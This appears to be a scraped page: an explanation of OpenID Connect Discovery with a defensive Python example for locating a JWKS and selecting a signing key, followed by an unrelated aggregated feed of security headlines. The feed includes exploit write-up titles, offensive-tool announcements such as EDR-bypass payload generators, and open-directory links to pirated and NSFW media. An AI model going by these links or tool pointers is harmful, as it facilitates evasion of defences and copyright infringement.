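    The question above is answered by OpenID Connect Discovery 1.0: a provider that supports discovery publishes its metadata at the issuer URL with /.well-known/openid-configuration appended (any trailing slash on the issuer's path is removed first), and the required jwks_uri field in that document tells clients where the key set lives. /.well-known/jwks.json is only a convention some providers choose for that jwks_uri, not something a client may assume. The Python example below, added here and not part of the post, walks that path: it builds the discovery URL from an issuer, checks the issuer echoed in the document, reads jwks_uri, loads the key set and picks the signing key for a token's kid. The discovery and JWKS documents are constructed inline in place of real HTTPS fetches, the hostnames are hypothetical, and the RSA modulus is a placeholder string rather than key material.

```python
import json
from urllib.parse import urlsplit, urlunsplit

# Constructed sample documents standing in for what a provider would serve over HTTPS.
SAMPLE_ISSUER = "https://issuer.example/tenant-a"
SAMPLE_DOCS = {
    "https://issuer.example/tenant-a/.well-known/openid-configuration": json.dumps({
        "issuer": "https://issuer.example/tenant-a",
        "authorization_endpoint": "https://issuer.example/tenant-a/authorize",
        "token_endpoint": "https://issuer.example/tenant-a/token",
        # Deliberately not under /.well-known: clients must read it from here.
        "jwks_uri": "https://keys.issuer.example/v1/tenant-a/keys",
        "id_token_signing_alg_values_supported": ["RS256"],
    }),
    "https://keys.issuer.example/v1/tenant-a/keys": json.dumps({
        "keys": [
            {"kty": "RSA", "kid": "2022-10", "use": "sig", "alg": "RS256",
             "n": "placeholder-modulus", "e": "AQAB"},
            {"kty": "RSA", "kid": "2022-04", "use": "enc",
             "n": "placeholder-modulus", "e": "AQAB"},
        ]
    }),
}


def discovery_url(issuer: str) -> str:
    """Discovery 1.0 section 4: append /.well-known/openid-configuration to the
    issuer, after removing any terminating slash from the issuer's path."""
    parts = urlsplit(issuer)
    if parts.scheme != "https" or not parts.netloc or parts.query or parts.fragment:
        raise ValueError("issuer must be an https URL with no query or fragment")
    path = parts.path.rstrip("/") + "/.well-known/openid-configuration"
    return urlunsplit((parts.scheme, parts.netloc, path, "", ""))


def sample_fetch(url: str) -> str:
    """Stand-in for an HTTPS GET; serves the constructed documents above."""
    if url not in SAMPLE_DOCS:
        raise LookupError(f"no document at {url}")
    return SAMPLE_DOCS[url]


def resolve_jwks(issuer: str, fetch=sample_fetch):
    """Return (jwks_uri, keys) for an issuer by following its discovery document."""
    metadata = json.loads(fetch(discovery_url(issuer)))
    # The issuer value in the document must match the one the client asked for;
    # a mismatch means the document describes some other (possibly attacker-chosen) issuer.
    if metadata.get("issuer") != issuer:
        raise ValueError("issuer in discovery document does not match requested issuer")
    jwks_uri = metadata["jwks_uri"]  # required metadata; no fixed path is implied
    if urlsplit(jwks_uri).scheme != "https":
        raise ValueError("jwks_uri must be https")
    return jwks_uri, json.loads(fetch(jwks_uri))["keys"]


def select_signing_key(keys, kid: str, alg: str):
    """Pick the single key usable to verify a token whose header carries kid and alg.
    Keys marked use=enc are never accepted for signature verification, and a key
    that declares a different alg than the token is rejected, so the token header
    cannot steer verification onto the wrong algorithm."""
    matches = [k for k in keys if k.get("kid") == kid and k.get("use", "sig") == "sig"]
    if len(matches) != 1:
        raise LookupError(f"expected exactly one signing key with kid={kid!r}, found {len(matches)}")
    key = matches[0]
    if "alg" in key and key["alg"] != alg:
        raise ValueError(f"key {kid!r} is for {key['alg']}, token claims {alg}")
    return key


if __name__ == "__main__":
    uri, keys = resolve_jwks(SAMPLE_ISSUER)
    print("jwks_uri:", uri)
    print("signing key:", select_signing_key(keys, "2022-10", "RS256")["kid"])
```

    For the poster's own provider this means the JWKS can be hosted anywhere reachable over HTTPS, as long as the discovery document names it in jwks_uri; clients that hard-code /.well-known/jwks.json are relying on a provider-specific habit.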

    Crypto Bug Bounty Hunting: An Overview Since 2020
    This is article 2 of 4 for the BanklessDAO Writer’s Cohort. Continue reading on Coinmonks »
    WIFI Hacking (My Favorite Write up`s Till date)
    What is wifi hacking ? Continue reading on Medium »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    All about: IDORs
    IDORs happen when users can **access resources that do not belong to them** by directly reference the object ID, object number, or… Continue reading on Medium »
    Once upon a time, There lived a GHOST named “CYBERSECURITY”
    I am writing this blog after seeing the evolution of cybersecurity in the past few months or years. I thought of starting this blog with… Continue reading on Medium »

    The Confusing Lifetimes of AWS IAM Identity Center Access Tokens
    submitted by /u/csanders_ [link] [comments]
    Kerberos: New Attack Paths? AS Requested Service Tickets
    submitted by /u/sanitybit [link] [comments]
    Talking Trojan: Analyzing an Industry-Wide Disclosure
    submitted by /u/sanitybit [link] [comments]
    LuaJIT hacking: Crafting Shellcodes
    submitted by /u/pwntheplanet [link] [comments]
    GitHub - jafarlihi/connmap: connmap is an X11 desktop widget that shows location of your current network peers on a world map (tested only with i3wm). Made with C and libcairo.
    submitted by /u/jafarlihi [link] [comments]
    Another Tale of IBM i (AS/400) Hacking
    submitted by /u/buherator [link] [comments]
    A Deep Dive Into the APT28’s stealer called CredoMap
    submitted by /u/CyberMasterV [link] [comments]
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/jeandrew [link] [comments]
    Enhance your malware detection with WAF + YARA (WAFARAY)
    submitted by /u/alt3kx [link] [comments]
  • Open

    Porn, music, OSTs, movies, animes, audiobooks, latest TV shows and Cyberpunk game
    http://212.83.137.51/ submitted by /u/MuhPornAcc69
    Movies/TV Shows [NSFW]
    Was looking for HotD episodes and stumbled upon these: https://cd.awsitsolution.xyz/ http://54.39.52.63/ http://file.khulnaflix.net/ http://54.36.106.156/ http://103.155.150.26/data/ http://palpha.myqnapcloud.com/My_TV_Shows/ http://eagles-nest.net/Uploadz/ -- [VERY NSFW] not even sure why this was in the results submitted by /u/JasonSec
    Can't download stuff from an opendir.
    New to this. I found an opendir with some video files I'd like to view/download. Problem is, I can't do that. I tried VLC, JDownloader, IDM and XDM but there is no way. I don't get errors, it just does nothing. Am I missing something? Link submitted by /u/RadAway-
    Random Stuff
    https://dl.gamefa.com/user1/ https://dl.gamefa.com/user2/ https://dl.gamefa.com/user3/ https://dl.gamefa.com/user4/ https://dl.gamefa.com/user5/ submitted by /u/ilikemacsalot
    TV Shows and Movies
    http://51.158.153.210 Most of them are MP4s submitted by /u/ilikemacsalot
  • Open

    CSV export/import functionality allows administrators to modify member and message content of a workspace
    Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 - Bounty: $250
    Take over subdomains of r2.dev using R2 custom domains
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 - Bounty: $1125
    DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921
    Server-side request forgery (ssrf)
    Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240
    Directory Listing vulnerability on .packet8.net/php/include/
    8x8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846
    CORS Misconfiguration on Yelp
    Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616
  • Open

    What website do you know that ends with the ".tools" domain name?
    I have discovered that I can still fully access a website I frequent that ends with ".tools" even when my ISP goes down. I wish to see if I can access any website that ends with this extension ... and then I'll need to figure out how I can exploit this XP submitted by /u/Aeromorpher
  • Open

    Write-up: Authentication bypass via flawed state machine @ PortSwigger Academy
    Integrated Approach for Application Security and Security Operations Center using data correlation…
    Cloud Security Tooling Series — What the heck is a CSPM ?
    Understanding the concept of Cloud Security Posture Management (CSPM) Continue reading on InfoSec Write-ups »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS…
    CVE-2022–36934: An integer overflow in WhatsApp leading to remote code execution in an established…
    A Tale of Account Takeover
    CVE-2022–27492: An integer underflow in WhatsApp causing remote code execution when receiving a…
    Writing and Using Python Burp Extension — Adding a Custom Header Field
  • Open

    SecWiki News 2022-09-28 Review
    AWS lateral movement from a red team perspective by ourren; Trusted Confidential Computing White Paper by ourren; [HTB] Silo Writeup by 0x584a; For more of the latest articles, visit SecWiki
  • Open

    Vulnerability in Apache Pulsar allowed manipulator-in-the-middle attacks
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-apache-pulsar-allowed-manipulator-in-the-middle-attacks Comments URL: https://news.ycombinator.com/item?id=33009155 Points: 2 # Comments: 0
  • Open

    #100DaysOfHacking Day 89
    Guess what TryHackMe gave me Continue reading on Medium »
    Shortcut Attack — Capturing the NTLMv2 Hash
    See how simple it is to capture an NTLMv2 hash through a shortcut on the victim's desktop. Continue reading on 100security »
  • Open

    FreeBuf Morning Report | Another aim of the US cyberattack on Northwestern Polytechnical University exposed; Meta shuts down Russian fraudulent news sites at scale
    Infiltrating and controlling core devices of China's infrastructure, stealing Chinese users' private data, and, during the intrusion, querying a batch of people with sensitive identities inside China.
    DVWA walkthrough
    This requires basic SQL knowledge, which will not be repeated here.
    TC260 publishes "Information Security Technology: Requirements for Cybersecurity Crowdsourced Testing Services" (draft for comment)
    Cybersecurity crowdsourced testing services refer to the process of organizing unspecified natural persons or organizations, on a voluntary basis and under audit and supervision, to carry out security testing such as vulnerability discovery on network products and systems.
    In-depth analysis of WebLogic deserialization vulnerabilities
    Know yourself and know your enemy: learning to understand attackers' thinking helps optimize patching strategies and raises the level of defense.
    US subsidiary of Israeli defense giant Elbit Systems hit by hackers
    The network of Elbit Systems of America, a subsidiary of the Israeli defense contractor, was attacked by hackers in early June.
    Exploitation analysis of a deserialization vulnerability in an old JBoss version
    Exploitation analysis of a deserialization vulnerability in an old JBoss version.
    Key points of South Korean data compliance
    Driven by the digital economy, South Korea has a mature data protection legal system and has become one of the countries with the strictest data regulation.
    Another aim of the US cyberattack on Northwestern Polytechnical University exposed: querying information on people with sensitive identities inside China
    Further reveals the purpose of the US cyberattack on Northwestern Polytechnical University: infiltrating and controlling core devices of China's infrastructure, stealing Chinese users' private data, and more.
  • Open

    CVE-2022-40674: libexpat before 2.4.9 has a use-after-free in xmlparse.c
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-40674 Comments URL: https://news.ycombinator.com/item?id=33006691 Points: 1 # Comments: 0
  • Open

    Tool to unlock SD cards
    Hi there, I am working on an SD card that is password protected. Can anyone recommend a (preferably Linux) tool to unlock the card? submitted by /u/Knuust
    Signal Extraction/Parsing iOS?
    Has anyone been able to extract Signal data on iOS with known passcodes? If so, which tool? We have Axiom and Cellebrite but have not had success. Perhaps via parsing a Signal backup? submitted by /u/Plane-Woodpecker1517
  • Open

    Freeze - Payload Generation Toolkit for Bypassing EDR
    submitted by /u/roobixx
  • Open

    Trip.com: Large Scale Cloud Native Networking & Security with Cilium/eBPF (eBPFSummit, 2022)
    This is an extended version of our talk at eBPF Summit 2022: Large scale cloud native networking and security with Cilium/eBPF: 4 years production experiences from Trip.com. This version covers more content and details that are missing from the talk (due to time limitations). Abstract 1 Cloud Infrastructure at Trip.com 1.1 Layered architecture 1.2 More details 2 Cilium at Trip.com 2.1 Timeline of rolling out 2.2 Customizations 2.3 Optimizations & tunings 2.3.1 Decouple installation 2.3.2 Avoid retry/restart storms 2.3.3 Stability first 2.3.4 Planning for scale 2.3.5 Performance tuning 2.3.6 Observability & alerting 2.3.7 Misc options 2.4 Multi-cluster solution 2.4.1 ClusterMesh 2.4.2 KVStoreMesh 3 Advanced trouble shooting skills 3.1 Debugging with delve/dlv 3.2 Trac…

  • Open

    Where to go from here?
    Hi all. Just recently obtained GCFA. Also obtained GCFE, GCIH, GCTI in the past two years, been very fortunate. In the next year, I figure I will go for the GIME (MacOS and iOS), and another SANS, not sure on that one (thought about GNFA, or maybe GPEN, just for fun, GREM has also crossed my mind). But eventually, I'll need to look beyond SANS for training, and I am not sure where to take things. I would like to be "well rounded," so to speak. Reverse engineering interests me, but also seems daunting and not completely my bag. Currently working in an IR role with the occasional forensics case. I guess, since I'm at least familiar with Windows, and have a plan for MacOS, the obvious gap is Linux. Is Hal Pomeranz basically the place to start? Haven't looked much into resources for Linux based forensics, but would love to learn. In general, just looking for what's useful for DFIR careers so I can continue expanding knowledge and developing skills. submitted by /u/KillithidMindslayer
    How is the $MFT, $LogFile... data hidden?
    Hi, I'm making some forensic investigations and I don't know if any of you know how you can hide a file just like $MFT, or if anyone knows what Windows does to hide it. I know that there are several ways to see it, but I'm still curious to know if you can hide any file just like that. submitted by /u/Pasiones
    Data Remediation Utilities
    What are you all using for Data Remediation that you can recommend? We have a mix of PC / OSX systems and are looking to secure erase individual files. Usually I would create a Batch script for SDelete but I want to go about this differently. Preferably something with a UI that can generate a certificate of destruction. If it can be run in a portable fashion from an external drive without needing installation, that would be great too. Kill Disk looks promising but they have so many different versions it's hard to tell what I need. Has anyone used this before? Appreciate any recommendations. submitted by /u/no_sushi_4_u
    Hardware encrypted USB suggestions??
    What products are we using for hardware encrypted drives to move data around and store forensic data securely? submitted by /u/dfzachary
  • Open

    Latest from #princessmthombeni
    submitted by /u/DusyaLove1
    one of the better sources >>>>>
    https://old.reddit.com/r/CollapsePrep/comments/xoan2m/stumbled_across_a_gem_of_a_page_back_from_the_dead/ submitted by /u/illiniwarrior
    Cyberpunk - Edgerunners
    Sorry, I know it's been posted before but I really was looking for this lot. Big files but.... http://212.83.137.51/TDownloads/Cyberpunk - Edgerunners - S01 - MULTi 1080p WEB x264 -NanDesuKa (NF)//) submitted by /u/Hyp3rionX
  • Open

    password field autocomplete enabled
    Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773
    insecure gitlab repositories at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 - Bounty: $500
    XSS Reflected on reddit.com via url path
    Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 - Bounty: $5000
  • Open

    NO RATE LIMITING
    Hello folks, so this is my first write-up and it's a special one since this is the beginning of writing more content. Continue reading on Medium »
    NFTuLoan Partners with Immunefi, Web3’s Leading Bug Bounty Platform to offer $10,000 Bounty Reward
    NFTuLoan is excited to announce its new partnership with Immunefi. While NFTuloan focuses on the NFT aspect of blockchain technology… Continue reading on Medium »
    Tools for Bug Bounty
    Wassup bug hunters! 🚀 Continue reading on Medium »
    Multi-Factor Authentication Vulnerabilities
    Hi, my name is Hashar Mujahid and in this blog, we will discuss MFA and the most common MFA vulnerabilities that might occur. Continue reading on InfoSec Write-ups »
  • Open

    The difference between signature-based and behavioural detections
    submitted by /u/S3cur3Th1sSh1t
    Ken Thompson Really Did Launch His "Trusting Trust" Trojan Attack in Real Life
    submitted by /u/nic0nicon1
    Detecting and Mitigating the GateKeeper User Override on macOS in an Enterprise Environment
    submitted by /u/sanitybit
    Audit your DNS config, you'd be shocked at how bad it can get
    submitted by /u/punksecurity_simon
    Diving Into Electron Web API Permissions
    submitted by /u/nibblesec
    A technical analysis of Pegasus for Android – Part 2
    submitted by /u/CyberMasterV
    Skidaddle Skideldi - I just pwnd your PKI
    submitted by /u/0xdea
    Vulnerability in WhatsApp mobile apps could result in remote code execution in an established video call (CVSS 9.8)
    submitted by /u/qwerty0x41
  • Open

    Looking for Incident Responders, TI Analysts, and Researchers to Join
    submitted by /u/ChineseAPTsEatBabies
  • Open

    New Malware Variants Serve Bogus CloudFlare DDoS Captcha
    When attackers shift up their campaigns, change their payload or exfiltration domains, and put some extra effort into hiding their malware it’s usually a telltale sign that they are making some money off of their exploits. One such campaign is the fake CloudFlare DDoS pages which we reported on last month. The attack is simple: when browsing an infected website, the user receives a notification that insists they must download a file to continue to access the content. Continue reading New Malware Variants Serve Bogus CloudFlare DDoS Captcha at Sucuri Blog.
  • Open

    Complete take-over of Cisco Unified Communications Manager due to consecutive misconfigurations
    SANS Top 25 Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write
    How to exploit DOM XSS on DVWA — StackZero
    In this write-up we will learn how to pass all levels of DOM XSS on DVWA so we can better understand that vulnerability. Continue reading on InfoSec Write-ups »
    Multi-Factor Authentication Vulnerabilities
  • Open

    UAF and House Of Force Fun - ROMHack CTF Swordmaster Pwn Challenge
    submitted by /u/0xcalico
  • Open

    SANS Top 25 Software Errors (Part 2 of 25)
    CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) Continue reading on CodeX »
  • Open

    SecWiki News 2022-09-27 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki
  • Open

    Working with data in JSON format
    What is JSON? JSON is an acronym for JavaScript Object Notation. For years it has been in use as a common serialization format for APIs across the web. It also has gained favor as a format for logging (particularly for use in structured logging). Now, it has become even more common for... The post Working with data in JSON format appeared first on TrustedSec.
  • Open

    More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID
    Polyglot files, such as the malicious CHM file analyzed here, can be abused to hide from anti-malware systems that rely on file format identification. The post More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID appeared first on Unit 42.
  • Open

    Edward Snowden Is a Russian Citizen Now
    “After two years of waiting and nearly ten years of exile…” Continue reading on Medium »
    GEOLOCATION CHALLENGE
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »
  • Open

    WitAwards 2022 China Cybersecurity Industry Annual Awards officially launched!
    Starting today, the WitAwards 2022 China Cybersecurity Industry Annual Awards are officially open, with five award categories; the winners will be announced and presented on site at the CIS 2022 Cybersecurity Innovation Conference.
    FreeBuf Morning Report | Australia to comprehensively revise its privacy law; EU ENISA releases a cybersecurity skills framework
    Russian President Putin granted NSA whistleblower Snowden Russian citizenship.
    Anonymous declares war on the Iranian government, launching the OpIran campaign against government websites
    The hacker collective Anonymous announced the launch of the OpIran campaign against Iran, attacking Iranian government websites, including those of intelligence agencies and the police.
    Putin formally grants Snowden Russian citizenship
    Russian President Putin formally signed an order granting Edward Snowden Russian citizenship; the corresponding document has been published on the legal information portal.
    Ukrainian authorities warn allies that Russia is planning to escalate cyberattacks
    Ukraine's military intelligence warned that Russia is planning "massive cyberattacks" on the critical infrastructure of Ukraine and its allies.
    Even a mouse hover can infect you! Malicious PPT files are being used to spread Graphite malware
    Russian hackers are using this technique to make their attacks stealthier.
  • Open

    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF Vulnerability Analysis
    Author: xxhzz@星阑科技PortalLab Original link: https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg Vulnerability description: On June 29, Atlassian published a security advisory stating that multiple Atlassian Jira products contain a server-side request forgery (SSRF) vulnerability; an authenticated remote attacker can send a specially crafted request to the Jira Core REST API, causing the server to issue a forged req...
  • Open

    Multiple iSerialNumbers for the same device and other USB oddities
    Who else has seen this behavior that can lend some insight into what is going on? The attached image shows entries within the USBStor key (serial numbers partially crossed-out in blue). You'll see multiple devices have multiple unique iSerialNumbers. I have not come across this before and have only been able to spitball the cause (USB dock in use? Plugged into different hardware ports?). There are some other interesting things going on. The devices identified in orange were all plugged in within an approximately 10-minute period, with different first connect/last connect/last disconnect times for each iSerialNumber. This is shown both in the registry and event logs. The devices marked with a green star appear to be the same device - same VID/PID and no other differentiating characteristics. Any idea what is happening on this computer? I do not have access to the devices, just the host (Windows 10 build 19044). https://preview.redd.it/6eb1vn881aq91.png?width=727&format=png&auto=webp&s=38684ec7d5132a0d47efed5925703fa1e6bc90ae submitted by /u/ebarboza311
  • Open

    MemProcFS: An easy and convenient way of viewing physical memory as files in a virtual file system.
    submitted by /u/sanitybit
    monomorph: MD5-Monomorphic Shellcode Packer - Pack arbitrary shellcode into an executable that always has the same MD5 hash
    submitted by /u/sanitybit
    Designing an end-to-end encrypted note sharing service
    submitted by /u/0x414141
    Vultron: A Protocol for Coordinated Vulnerability Disclosure
    submitted by /u/sanitybit
    A study of cracked passwords from breaches demonstrates which geographical factors have the most impact on password strength
    submitted by /u/obilodeau
    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 2
    submitted by /u/mdulin2
    Microsoft Shift F10 bypass + Autopilot privilege escalation
    submitted by /u/k4m1ll0
  • Open

    Vultron: A Protocol for Coordinated Vulnerability Disclosure
    Article URL: https://insights.sei.cmu.edu/blog/vultron-a-protocol-for-coordinated-vulnerability-disclosure/ Comments URL: https://news.ycombinator.com/item?id=32988651 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-09-26 Review
    SecWiki Weekly (Issue 447) by ourren; Http Request-Smuggling by the SecIN community; For more of the latest articles, visit SecWiki
  • Open

    Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV [PDF+EXPLOIT]
    submitted by /u/soupcreamychicken
  • Open

    Main Domain Takeover at https://www.marketo.net/
    Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914
  • Open

    How to Translate Videos and Documents for OSINT Investigations
    He who knows no foreign languages knows nothing of his own. Continue reading on The Sleuth Sheet »
    OhSINT TryHackMe Challenge
    Using Open Source Intelligence Continue reading on Medium »
    I found your keys — secrets on GitHub
    Secrets are, well, secrets, and it boggles the mind that I frequently find them on GitHub. In this post, we will discuss how I often… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #7
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Top 10 Podcasts for Intelligence, Security and Geopolitics
    There’s been a significant increase in consumption of audio-only content over the last decade with reports estimating that there’ll be… Continue reading on Medium »
    How I Can Use Your Gmail Account to Find Out Where You Live and Possibly More
    Disclaimer: All information and techniques provided in this article are for educational purposes only. I will not be held responsible for… Continue reading on Medium »
  • Open

    JSON web tokens
    For decades cookies have been used to authenticate a user and hold session data. But a simple session cookie has certain limitations and… Continue reading on InfoSec Write-ups »
    Monitoring your targets for bug bounties
    Top 10 Dockerfile Security Best Practices for a More Secure Container
    Android Hardening Guide
    Connect State Attack — First Request Validation
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
  • Open

    Monitoring your targets for bug bounties
    An intro to setting up a monitoring system for your bug bounty target Continue reading on InfoSec Write-ups »
    TryHackMe 0day Machine Walkthrough
    Description: Hi friends, I will be sharing with you the solution to the machine named '0day' on the TryHackMe platform. In this machine… Continue reading on Medium »
    Nmap in pocket : A complete guide
    Welcome Hackers, Continue reading on Medium »
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
    Hola Amigo!! Continue reading on InfoSec Write-ups »
    Journey to my first bug
    Yeah this is my first blog ever… It took me 4 Months + 2 Months gap = 6 Months, 2–3 hrs Each day to reach my first valid bug. Continue reading on Medium »
    Bug Bounty Reference
    Introduction Continue reading on Medium »
    Security Council and "Airdrop" Machine Initiative
    Since the beginning of Hats, we have envisioned a future in which communities, developers and security experts collaborate… Continue reading on Medium »
  • Open

    Hunting for Unsigned DLLs to Find APTs
    Hunting for the loading of unsigned DLLs can help you identify attacks and threat actors in your environment. Our examples include well-known APTs. The post Hunting for Unsigned DLLs to Find APTs appeared first on Unit 42.
  • Open

    FreeBuf Morning Report | Anonymous declares war on the Iranian government; TikTok faces a £27 million fine over children's privacy data protection
    On September 25 local time, Anonymous declared war on the Iranian government and launched the #OpIran campaign against government websites.
    GitHub users beware: phishing campaign impersonates CircleCI to steal credentials
    A phishing campaign impersonating the CircleCI DevOps platform is targeting GitHub users to steal credentials and two-factor authentication (2FA) codes.
    Australia's largest data breach in history: information on 40% of residents leaked
    The breach affected around 40% of the country's population and has become one of the largest cybersecurity incidents in Australian history.
    "Anonymous" claims to have hacked the Russian Ministry of Defense website
    The hacker collective Anonymous claims to have successfully breached the Russian Ministry of Defense website and leaked the data of 305,925 people.
    To prevent phishing, the new Windows 11 version warns when a password is typed into Notepad or a website
    The newly released Windows 11 22H2 ships with a new security feature, enhanced phishing protection, that warns users when they enter their Windows password into an insecure application or website.
    First city (regional) map in the country | Chengdu cybersecurity featured enterprise map (first edition) released
    Aims to help build Chengdu into a cybersecurity city, jointly build a new cybersecurity ecosystem in western China, and promote the healthy development of the national cybersecurity industry.
  • Open

    A couple of series, a couple of films.
    English subtitles included for all shows. https://drive.google.com/drive/folders/1JQ9lHYHLHJ8nXIpywuuCq4V89Phr5qry?usp=sharing submitted by /u/GeniusOfLove74
    Searching for vulnerable directory listings??
    Came across this blog (https://blog.criminalip.io/2022/09/22/google-hacking/) that compared Google Hacking and Criminal IP when looking for vulnerable directory listings. What do you guys think is better? It does mention that Criminal IP shows more data than Google Hacking but Google Hacking has more filters than Criminal IP. Any opinion would be very much appreciated. Thanks! submitted by /u/Glad_Living3908
  • Open

    Bug Bounty Reference
    Introduction Continue reading on Medium »
  • Open

    Bumblebee malware returns with a new infection technique
    Author: Threat Intelligence Team Translator: Knownsec 404 Lab translation group Original link: https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/ Delivering payloads using a post-exploitation framework. During our routine threat hunting activities, Cyble Research & Intelligence Labs (CRIL) discovered a Twit...
    An introduction to MiraclePtr, a UAF exploit mitigation technique
    Author: 墨云科技VLab Team Original link: https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw On September 13, 2022, the Google security team published an article on its security blog about MiraclePtr, describing the Google Chrome security team's progress in mitigating UAF exploitation. Since MiraclePtr does not refer to a single smart-pointer technique but covers the Google secu...
  • Open

    Reflected xss on videostore.mtnonline.com
    MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248
  • Open

    Need Magnet Axiom Price for College Paper
    I am writing a paper for a computer forensics class, and need to compare forensic tools for Mac and iOS devices, including their costs. Magnet doesn't list the price on their website, and Google failed in finding me even an estimate. What is the price for the purchase of one Magnet Axiom license? submitted by /u/PMmeagoodstory
    Adjacent Careers to Digital Forensics
    Hello Everyone, I've been perusing the threads here and the consensus seems to be that digital forensics is a difficult field to break into. In fact, it appears that many people get a job in DF after working in either law enforcement or another area of information technology altogether. Previously, I had worked in insurance claims adjusting and then went back to school to study DF (being a claims adjuster wasn't for me, but that's another story). I got my Bachelor of Science last August. Currently, I'm working a general IT help desk / software support job and making less money than before I started my DF degree. I'm also not using any of the skills I learned in class, and there do not appear to be any opportunities to do so with my present employer. I have reached out to my school's career center for guidance and despite repeated phone calls never heard anything back. Also attended career fairs and made contacts, tried reaching out to people on LinkedIn, etc. Does anyone have suggestions for adjacent careers that use DF skills and also have a good amount of entry level opportunities? submitted by /u/ZergBah
  • Open

    Google VRP Teaser - Today I Learned
    submitted by /u/TechbrunchFR
    Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.
    submitted by /u/ergrelet
    Sleep obfuscation technique leveraging waitable timers to evade memory scanners.
    submitted by /u/Idov31
  • Open

    UBER: The Personal Vendetta
    submitted by /u/banginpadr
  • Open

    SecWiki News 2022-09-25 Review
    A guide to stealing and protecting files on USB drives by 路人甲; goby指纹提取与yara逆向.md (Goby fingerprint extraction and YARA reverse engineering) by 路人甲; Historical vulnerability analysis of an open-source bastion host by 路人甲; On my recent failed bug-hunting experiences by ourren; git-vuln-finder: Finding potential software vulnerabilities from git commit by ourren; For more of the latest articles, visit SecWiki
  • Open

    UBER: The Personal Vendetta
    Never underestimate someone’s ability Continue reading on Dev Genius »
    Tesla paid me $10,000 because of Directory Indexing
    Many people are interested in trying Bug Bounties, but they feel they won’t be able to find anything. I hope that my success will serve as… Continue reading on Medium »
    eWPT to eWPTX Certified in 45 days (without INE labs) — Exam Review and Tips
    In this article, I am going to provide feedback and helpful tips for the eWPT and eWPTXv2 exams. Continue reading on System Weakness »
    Genymotion Virtualbox configuration error solved !!
    After a Windows update, I am facing a VirtualBox error. I tried the Genymotion help center https://support.genymotion.com/hc/en-us. Continue reading on Medium »
    Shopping App Deeplink Arbitrary URLs
    In this write-up, I’ll tell you how I was able to launch Arbitrary URLs to the internal web of the shopping application. Continue reading on Medium »
    Stored XSS at Nvidia via Angular JS template injection
    Hello security folks, I'm gonna talk about how I got Stored XSS at Nvidia Continue reading on Medium »

    Learn NMAP to find your first Network Vulnerability
    Article URL: https://hackerask.com/articles/how-to-use-nmap-to-find-vulnerabilities.html Comments URL: https://news.ycombinator.com/item?id=32972486 Points: 2 # Comments: 1

    Comprehensive List of CVE PoC's
    Article URL: http://www.jamessawyer.co.uk/pub/cve_links.txt Comments URL: https://news.ycombinator.com/item?id=32972064 Points: 1 # Comments: 0

    ThinkPHP 3.2.3: vulnerability audit summary
    Using a framework means someone else has already done part of the groundwork, so developers only need to concentrate on designing the system's business logic. Compared with development in raw code it is also more stable, more secure and easier to extend.
    [Frontier Analysis] Stanford researchers' paper: the mechanism, innovations and limitations of ERC20721R, a reversible-transaction standard for Ethereum
    The reversal mechanism: who can initiate it? How are funds frozen? Who arbitrates?
    DotNet security: the IIS request pipeline and its use in penetration testing
    DotNet security: the IIS request pipeline and its use in penetration testing, including exploitation of common IIS backdoors. Team WeChat account: 7bits安全团队 (7bits Security Team), follow us~

    SPY NEWS: 2022 — Week 38
    Summary of the espionage-related news stories for the Week 38 (September 18–24) of 2022. Continue reading on Medium »

    late night g/g 'adult' entertainment!
    Mods/Admins - I did due diligence to ensure this wasn't a repost. If it is, please feel free to kill the post..... http://162.243.172.84/ submitted by /u/LucasImages [link] [comments]

    Cracking Linux Password Hash with John The Ripper
    In this short tutorial I will share how can you crack Linux password hash using John the Ripper. Let’s begin. Continue reading on Medium »

    Zero Trust - From Zero to One Hundred
    submitted by /u/Khryse [link] [comments]
    The “Privileges Required” trap in CVSS 3.1
    submitted by /u/DebugDucky [link] [comments]
    Hacking the PS4 / PS5 through the PS2 Emulator - Part 1 - Escape
    submitted by /u/digicat [link] [comments]

    Best methods for accessing kernel mode from user mode (Windows)
    What are the ways to access kernel mode from user mode? Which of these methods is better for 2022 and 2023? Which methods are obsolete? submitted by /u/soupcreamychicken [link] [comments]

    Skidaddle Skideldi - I just pwnd your PKI
